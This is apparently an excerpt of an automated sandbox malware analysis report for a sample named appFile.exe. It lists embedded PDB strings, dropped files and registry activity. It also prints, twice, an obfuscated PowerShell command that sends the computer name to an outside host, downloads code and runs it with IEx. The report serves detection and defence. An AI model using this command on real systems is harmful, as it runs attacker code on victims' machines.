      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: windowscodecs.dll
      Source: C:\Users\user\Desktop\appFile.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpWindow found: window name: TMainForm
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
      Source: appFile.exeStatic file information: File size 37872978 > 1048576
      Source: appFile.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: umdmxfrm.pdb source: appFile.exe
      Source: Binary string: msdadc.pdb source: appFile.exe
      Source: Binary string: WalletProxy.pdb source: appFile.exe
      Source: Binary string: mprext.pdbGCTL source: appFile.exe
      Source: Binary string: msvfw32.pdb source: appFile.exe
      Source: Binary string: msident.pdbGCTL source: appFile.exe
      Source: Binary string: odpdx32.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: appFile.exe
      Source: Binary string: WSClient.pdbGCTL source: appFile.exe
      Source: Binary string: ws2help.pdb source: appFile.exe
      Source: Binary string: winsockai.pdbGCTL source: appFile.exe
      Source: Binary string: ODBCCR32.pdb source: appFile.exe
      Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000010.00000002.2149016419.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2149016419.0000000002DFC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: api-ms-win-core-shutdown-l1-1-0.pdb source: appFile.exe
      Source: Binary string: mscat32.pdb source: appFile.exe
      Source: Binary string: UserDataLanguageUtil.pdb source: appFile.exe
      Source: Binary string: mprext.pdb source: appFile.exe
      Source: Binary string: msctfui.pdb source: appFile.exe
      Source: Binary string: appxprovisionpackage.pdb source: appFile.exe
      Source: Binary string: hnetmon.pdb source: appFile.exe
      Source: Binary string: CHxReadingStringIME.pdb source: appFile.exe
      Source: Binary string: mscpxl32.pdb source: appFile.exe
      Source: Binary string: msdaenum.pdbGCTL source: appFile.exe
      Source: Binary string: cmifw.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: appFile.exe
      Source: Binary string: servicemodelregai.pdb source: appFile.exe
      Source: Binary string: tapiperf.pdbGCTL source: appFile.exe
      Source: Binary string: l2nacp.pdbGCTL source: appFile.exe
      Source: Binary string: licmgr10.pdb source: appFile.exe
      Source: Binary string: nddeapi.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-sysinfo-l1-2-1.pdb source: appFile.exe
      Source: Binary string: sppinst.pdb source: appFile.exe
      Source: Binary string: odbcji32.pdbGCTL source: appFile.exe
      Source: Binary string: wshunix.pdbGCTL source: appFile.exe
      Source: Binary string: snmpapi.pdb source: appFile.exe
      Source: Binary string: >ile-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-fibers-l1-1-1.pdb source: appFile.exe
      Source: Binary string: IMEDICAPICCPS.pdbGCTL source: appFile.exe
      Source: Binary string: pntw.pdbGCTL source: appFile.exe
      Source: Binary string: SLWGA.pdbUGP source: appFile.exe
      Source: Binary string: msjint40.pdb source: appFile.exe
      Source: Binary string: netfxconfig.pdbGCTL source: appFile.exe
      Source: Binary string: ir41_qc.pdb source: appFile.exe
      Source: Binary string: ir41_qcx.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: appFile.exe
      Source: Binary string: odbcbcp.pdb source: appFile.exe
      Source: Binary string: PSModuleDiscoveryProvider.pdb source: appFile.exe
      Source: Binary string: msdatt.pdbGCTL source: appFile.exe
      Source: Binary string: mfdvdec.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000010.00000002.2153441742.0000000007485000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: storagewmi_passthru.pdbGCTL source: appFile.exe
      Source: Binary string: msdasc.pdb source: appFile.exe
      Source: Binary string: wmiprop.pdbGCTL source: appFile.exe
      Source: Binary string: msafd.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-1.pdb source: appFile.exe
      Source: Binary string: clb.pdb source: appFile.exe
      Source: Binary string: msdaenum.pdb source: appFile.exe
      Source: Binary string: spnet.pdbGCTL source: appFile.exe
      Source: Binary string: mssip32.pdb source: appFile.exe
      Source: Binary string: SLWGA.pdb source: appFile.exe
      Source: Binary string: msident.pdb source: appFile.exe
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.2149016419.0000000002DCC000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ir50_qcx.pdb source: appFile.exe
      Source: Binary string: mscpxl32.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: appFile.exe
      Source: Binary string: VscMgrPS.pdbGCTL source: appFile.exe
      Source: Binary string: syssetup.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: appFile.exe
      Source: Binary string: PerceptionSimulation.ProxyStubs.pdb source: appFile.exe
      Source: Binary string: api-ms-win-service-management-l1-1-0.pdb source: appFile.exe
      Source: Binary string: msdadc.pdbGCTL source: appFile.exe
      Source: Binary string: msvcp60.pdb source: appFile.exe
      Source: Binary string: ndproxystub.pdbGCTL source: appFile.exe
      Source: Binary string: peerdistai.pdb source: appFile.exe
      Source: Binary string: wlanutil.pdb source: appFile.exe
      Source: Binary string: RemoveDeviceElevated.pdbGCTL source: appFile.exe
      Source: Binary string: wsock32.pdb source: appFile.exe
      Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: appFile.exe
      Source: Binary string: panmap.pdb source: appFile.exe
      Source: Binary string: odtext32.pdb source: appFile.exe
      Source: Binary string: DelegatorProvider.pdb source: appFile.exe
      Source: Binary string: txfw32.pdb source: appFile.exe
      Source: Binary string: msctfui.pdbGCTL source: appFile.exe
      Source: Binary string: umdmxfrm.pdbGCTL source: appFile.exe
      Source: Binary string: msiltcfg.pdb source: appFile.exe
      Source: Binary string: pntw.pdb source: appFile.exe
      Source: Binary string: lz32.pdbGCTL source: appFile.exe
      Source: Binary string: -l1-1-0.pdb source: appFile.exe
      Source: Binary string: UserDataLanguageUtil.pdbGCTL source: appFile.exe
      Source: Binary string: msiltcfg.pdbGCTL source: appFile.exe
      Source: Binary string: snmpapi.pdbUGP source: appFile.exe
      Source: Binary string: hnetmon.pdbGCTL source: appFile.exe
      Source: Binary string: CHxReadingStringIME.pdbGCTL source: appFile.exe
      Source: Binary string: storprop.pdbGCTL source: appFile.exe
      Source: Binary string: storprop.pdb source: appFile.exe
      Source: Binary string: usbperf.pdbGCTL source: appFile.exe
      Source: Binary string: clb.pdbGCTL source: appFile.exe
      Source: Binary string: winrssrv.pdbGCTL source: appFile.exe
      Source: Binary string: whhelper.pdbGCTL source: appFile.exe
      Source: Binary string: API-MS-Win-Eventing-Controller-L1-1-0.pdb source: appFile.exe
      Source: Binary string: RpcNs4.pdbGCTL source: appFile.exe
      Source: Binary string: SyncHostPS.pdbGCTL source: appFile.exe
      Source: Binary string: winrssrv.pdb source: appFile.exe
      Source: Binary string: msdasc.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: appFile.exe
      Source: Binary string: appxprovisionpackage.pdbGCTL source: appFile.exe
      Source: Binary string: Microsoft.BitLocker.Structures.pdb source: appFile.exe
      Source: Binary string: ir41_qc.pdbGCTL source: appFile.exe
      Source: Binary string: VscMgrPS.pdb source: appFile.exe
      Source: Binary string: sppinst.pdbGCTL source: appFile.exe
      Source: Binary string: usbperf.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: appFile.exe
      Source: Binary string: pspluginwkr.pdb source: appFile.exe
      Source: Binary string: svcext.pdbGCTL source: appFile.exe
      Source: Binary string: msrating.pdb source: appFile.exe
      Source: Binary string: softpub.pdb source: appFile.exe
      Source: Binary string: ifsutilx.pdbGCTL source: appFile.exe
      Source: Binary string: winsockai.pdb source: appFile.exe
      Source: Binary string: pcwum.pdb source: appFile.exe
      Source: Binary string: SyncInfrastructurePS.pdbGCTL source: appFile.exe
      Source: Binary string: sppwmi.pdbGCTL source: appFile.exe
      Source: Binary string: IMEDICAPICCPS.pdb source: appFile.exe
      Source: Binary string: msxactps.pdbGCTL source: appFile.exe
      Source: Binary string: ndproxystub.pdb source: appFile.exe
      Source: Binary string: odbcji32.pdb source: appFile.exe
      Source: Binary string: bcdeditai.pdb source: appFile.exe
      Source: Binary string: SyncHostPS.pdb source: appFile.exe
      Source: Binary string: NetworkItemFactory.pdb source: appFile.exe
      Source: Binary string: odbcbcp.pdbGCTL source: appFile.exe
      Source: Binary string: utildll.pdbUGP source: appFile.exe
      Source: Binary string: msafd.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-localization-l1-2-1.pdb source: appFile.exe
      Source: Binary string: msdaurl.pdb source: appFile.exe
      Source: Binary string: winml.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-heap-obsolete-l1-1-0.pdb source: appFile.exe
      Source: Binary string: Magnification.pdbGCTL source: appFile.exe
      Source: Binary string: oddbse32.pdb source: appFile.exe
      Source: Binary string: lper.pdb source: appFile.exe
      Source: Binary string: DBnmpntw.pdb source: appFile.exe
      Source: Binary string: SetIEInstalledDateAI.pdbGCTL source: appFile.exe
      Source: Binary string: aspperf.pdbGCTL source: appFile.exe
      Source: Binary string: ODBCCR32.pdbGCTL source: appFile.exe
      Source: Binary string: cca.pdb source: appFile.exe
      Source: Binary string: IEFileInstallAI.pdbGCTL source: appFile.exe
      Source: Binary string: TimeDateMUICallback.pdb source: appFile.exe
      Source: Binary string: RpcNs4.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-kernel32-legacy-l1-1-1.pdb source: appFile.exe
      Source: Binary string: cmcfg32.pdbGCTL source: appFile.exe
      Source: Binary string: RemoveDeviceElevated.pdb source: appFile.exe
      Source: Binary string: f:\binaries.x86ret\bin\i386\Optimization\opt\wpf\wpfgfx_v0300.pdb source: appFile.exe
      Source: Binary string: SetIEInstalledDateAI.pdb source: appFile.exe
      Source: Binary string: IconCodecService.pdb source: appFile.exe
      Source: Binary string: cmlua.pdbGCTL source: appFile.exe
      Source: Binary string: TTDPlm.pdbGCTL source: appFile.exe
      Source: Binary string: ir50_qcx.pdbGCTL source: appFile.exe
      Source: Binary string: mimofcodec.pdb source: appFile.exe
      Source: Binary string: TimeDateMUICallback.pdbGCTL source: appFile.exe
      Source: Binary string: mssip32.pdbGCTL source: appFile.exe
      Source: Binary string: LAPRXY.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: appFile.exe
      Source: Binary string: IconCodecService.pdbUGP source: appFile.exe
      Source: Binary string: PrintAdvancedInstaller.pdb source: appFile.exe
      Source: Binary string: netfxconfig.pdb source: appFile.exe
      Source: Binary string: msiwer.pdbGCTL source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbnMai source: powershell.exe, 00000010.00000002.2153441742.0000000007485000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: PaymentMediatorServiceProxy.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-service-core-l1-1-1.pdb source: appFile.exe
      Source: Binary string: icmp.pdb source: appFile.exe
      Source: Binary string: wmdrmsdk.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-devices-config-L1-1-0.pdb source: appFile.exe
      Source: Binary string: msvidc32.pdbGCTL source: appFile.exe
      Source: Binary string: IA2ComProxy.pdbGCTL source: appFile.exe
      Source: Binary string: cmstplua.pdb source: appFile.exe
      Source: Binary string: l2nacp.pdb source: appFile.exe
      Source: Binary string: spnet.pdb source: appFile.exe
      Source: Binary string: ir50_32.pdbGCTL source: appFile.exe
      Source: Binary string: odpdx32.pdb source: appFile.exe
      Source: Binary string: mscat32.pdbGCTL source: appFile.exe
      Source: Binary string: ztrace_maps.pdbGCTL source: appFile.exe
      Source: Binary string: cmifw.pdbGCTL source: appFile.exe
      Source: Binary string: ifsutilx.pdb source: appFile.exe
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbsx source: powershell.exe, 00000010.00000002.2153365718.0000000007471000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: security.pdbGCTL source: appFile.exe
      Source: Binary string: msvfw32.pdbGCTL source: appFile.exe
      Source: Binary string: storagewmi_passthru.pdb source: appFile.exe
      Source: Binary string: oddbse32.pdbGCTL source: appFile.exe
      Source: Binary string: VirtualDisplayManager.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: Magnification.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-1.pdb source: appFile.exe
      Source: Binary string: SixDofControllerManager.ProxyStubs.pdb source: appFile.exe
      Source: Binary string: IA2ComProxy.pdb source: appFile.exe
      Source: Binary string: PrintAdvancedInstaller.pdbGCTL source: appFile.exe
      Source: Binary string: msdatt.pdb source: appFile.exe
      Source: Binary string: nddeapi.pdb source: appFile.exe
      Source: Binary string: cmstplua.pdbGCTL source: appFile.exe
      Source: Binary string: winml.pdbGCTL source: appFile.exe
      Source: Binary string: DBnmpntw.pdbGCTL source: appFile.exe
      Source: Binary string: lper.pdbGCTL source: appFile.exe
      Source: Binary string: SixDofControllerManager.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: serialui.pdb source: appFile.exe
      Source: Binary string: msjint40.pdbV source: appFile.exe
      Source: Binary string: icmp.pdbGCTL source: appFile.exe
      Source: Binary string: SAS.pdbGCTL source: appFile.exe
      Source: Binary string: Microsoft.BitLocker.Structures.pdbiC source: appFile.exe
      Source: Binary string: uniplat.pdb source: appFile.exe
      Source: Binary string: h-l1-2-0.pdb source: appFile.exe
      Source: Binary string: security.pdb source: appFile.exe
      Source: Binary string: wshunix.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: appFile.exe
      Source: Binary string: licmgr10.pdbUGP source: appFile.exe
      Source: Binary string: tapiperf.pdb source: appFile.exe
      Source: Binary string: syssetup.pdb source: appFile.exe
      Source: Binary string: modemui.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-xstate-l2-1-0.pdb source: appFile.exe
      Source: Binary string: wmiprop.pdb source: appFile.exe
      Source: Binary string: panmap.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-registry-l2-1-0.pdb source: appFile.exe
      Source: Binary string: cca.pdbGCTL source: appFile.exe
      Source: Binary string: mssign32.pdbGCTL source: appFile.exe
      Source: Binary string: ntlanui2.pdb source: appFile.exe
      Source: Binary string: lz32.pdb source: appFile.exe
      Source: Binary string: cmutil.pdbGCTL source: appFile.exe
      Source: Binary string: msdaer.pdb source: appFile.exe
      Source: Binary string: cmcfg32.pdb source: appFile.exe
      Source: Binary string: softpub.pdbGCTL source: appFile.exe
      Source: Binary string: SAS.pdb source: appFile.exe
      Source: Binary string: ntlanui2.pdbGCTL source: appFile.exe
      Source: Binary string: wmcodecdspps.pdb source: appFile.exe
      Source: Binary string: odfox32.pdbGCTL source: appFile.exe
      Source: Binary string: utildll.pdb source: appFile.exe
      Source: Binary string: API-MS-Win-EventLog-Legacy-L1-1-0.pdb source: appFile.exe
      Source: Binary string: mfdvdec.pdbUGP source: appFile.exe
      Source: Binary string: NetworkItemFactory.pdbGCTL source: appFile.exe
      Source: Binary string: LAPRXY.pdbGCTL source: appFile.exe
      Source: Binary string: wsock32.pdbUGP source: appFile.exe
      Source: Binary string: API-MS-Win-Core-Kernel32-Private-L1-1-0.pdb source: appFile.exe
      Source: Binary string: ws2help.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-security-cryptoapi-l1-1-0.pdb source: appFile.exe
      Source: Binary string: txfw32.pdbGCTL source: appFile.exe
      Source: Binary string: sppwmi.pdb source: appFile.exe
      Source: Binary string: SyncInfrastructurePS.pdb source: appFile.exe
      Source: Binary string: cmutil.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-string-obsolete-l1-1-0.pdb source: appFile.exe
      Source: Binary string: msiwer.pdb source: appFile.exe
      Source: Binary string: bcdeditai.pdbGCTL source: appFile.exe
      Source: Binary string: timezoneai.pdb source: appFile.exe
      Source: Binary string: mspbde40.pdb source: appFile.exe
      Source: Binary string: IEFileInstallAI.pdb source: appFile.exe
      Source: Binary string: msdatl3.pdbGCTL source: appFile.exe
      Source: Binary string: modemui.pdbGCTL source: appFile.exe
      Source: Binary string: peerdistai.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-registry-l1-1-0.pdb source: appFile.exe
      Source: Binary string: api-ms-win-core-wow64-l1-1-0.pdb source: appFile.exe
      Source: Binary string: pcwum.pdbGCTL source: appFile.exe
      Source: Binary string: odfox32.pdb source: appFile.exe
      Source: Binary string: wmcodecdspps.pdbGCTL source: appFile.exe
      Source: Binary string: rnr20.pdb source: appFile.exe
      Source: Binary string: shfolder.pdbGCTL source: appFile.exe
      Source: Binary string: mimofcodec.pdbGCTL source: appFile.exe
      Source: Binary string: WSClient.pdb source: appFile.exe
      Source: Binary string: TTDPlm.pdb source: appFile.exe
      Source: Binary string: serialui.pdbGCTL source: appFile.exe
      Source: Binary string: PaymentMediatorServiceProxy.pdb source: appFile.exe
      Source: Binary string: E:\A\_work\2\s\binaries\Win32\Release\msdbg2.pdb source: appFile.exe
      Source: Binary string: msdaurl.pdbGCTL source: appFile.exe
      Source: Binary string: icsigd.pdbGCTL source: appFile.exe
      Source: Binary string: msdaer.pdbGCTL source: appFile.exe
      Source: Binary string: cmlua.pdb source: appFile.exe
      Source: Binary string: msrating.pdbGCTL source: appFile.exe
      Source: Binary string: rnr20.pdbGCTL source: appFile.exe
      Source: Binary string: uniplat.pdbGCTL source: appFile.exe
      Source: Binary string: wlanutil.pdbGCTL source: appFile.exe
      Source: Binary string: serwvdrv.pdbGCTL source: appFile.exe
      Source: Binary string: ir50_32.pdb source: appFile.exe
      Source: Binary string: shfolder.pdb source: appFile.exe
      Source: Binary string: icsigd.pdb source: appFile.exe
      Source: Binary string: aspperf.pdb source: appFile.exe
      Source: Binary string: PSModuleDiscoveryProvider.pdbGCTL source: appFile.exe
      Source: Binary string: mssign32.pdb source: appFile.exe
      Source: Binary string: odtext32.pdbGCTL source: appFile.exe
      Source: Binary string: servicemodelregai.pdbGCTL source: appFile.exe
      Source: Binary string: msdatl3.pdb source: appFile.exe
      Source: Binary string: wmdrmsdk.pdbGCTL source: appFile.exe
      Source: Binary string: msvidc32.pdb source: appFile.exe
      Source: Binary string: WalletProxy.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-realtime-l1-1-0.pdb source: appFile.exe
      Source: Binary string: ztrace_maps.pdb source: appFile.exe
      Source: Binary string: msxactps.pdb source: appFile.exe
      Source: Binary string: serwvdrv.pdb source: appFile.exe
      Source: Binary string: PerceptionSimulation.ProxyStubs.pdbGCTL source: appFile.exe
      Source: Binary string: api-ms-win-core-comm-l1-1-0.pdb source: appFile.exe
      Source: Binary string: svcext.pdb source: appFile.exe
      Source: Binary string: timezoneai.pdbGCTL source: appFile.exe
      Source: Binary string: DelegatorProvider.pdbGCTL source: appFile.exe
      Source: Binary string: ir41_qcx.pdbGCTL source: appFile.exe
      Source: Binary string: whhelper.pdb source: appFile.exe
      Source: Binary string: VirtualDisplayManager.ProxyStubs.pdb source: appFile.exe

      Data Obfuscation

      barindex
      Suspicious powershell command line found
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; Jump to behavior
      Source: C:\Users\user\Desktop\appFile.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.drStatic PE information: real checksum: 0x33908a should be: 0x33ab8c
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.exe.11.drStatic PE information: section name: .didata
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.18.drStatic PE information: section name: .didata
      Source: S25734VPZD3VQL5I0DLUI2DAUAHZO.tmp.20.drStatic PE information: section name: .didata
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04C02D2D push esp; iretd 16_2_04C02D71
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_00BE8F56 pushfd ; iretd 49_2_00BE8F8B
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_0087C008 push ecx; mov dword ptr [esp], edx49_2_0087C00C
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_0087C068 push ecx; mov dword ptr [esp], edx49_2_0087C06C
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_0087C384 push 0087C3B0h; ret 49_2_0087C3A8
      Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeCode function: 49_2_0087C508 push 74000000h; iretd 49_2_0087C50D

      Persistence and Installation Behavior

      barindex
      Drops PE files with a suspicious file extension
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\723356\Ted.comJump to dropped file
      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\723356\Ted.comJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comFile created: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\is-NG40A.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeFile created: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exe (copy)Jump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_setup64.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-HEHVN.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Local\Temp\is-QU1EC.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\S25734VPZD3VQL5I0DLUI2DAUAHZO.exeFile created: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpJump to dropped file
      Source: C:\Users\user\AppData\Local\Temp\is-EOJP5.tmp\S25734VPZD3VQL5I0DLUI2DAUAHZO.tmpFile created: C:\Users\user\AppData\Local\Temp\is-O7LIQ.tmp\_isetup\_isdecmp.dllJump to dropped file
      Source: appFile.exeBinary or memory string: use Bcdedit.exe to add, delete, edit, a
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\appFile.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\723356\Ted.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
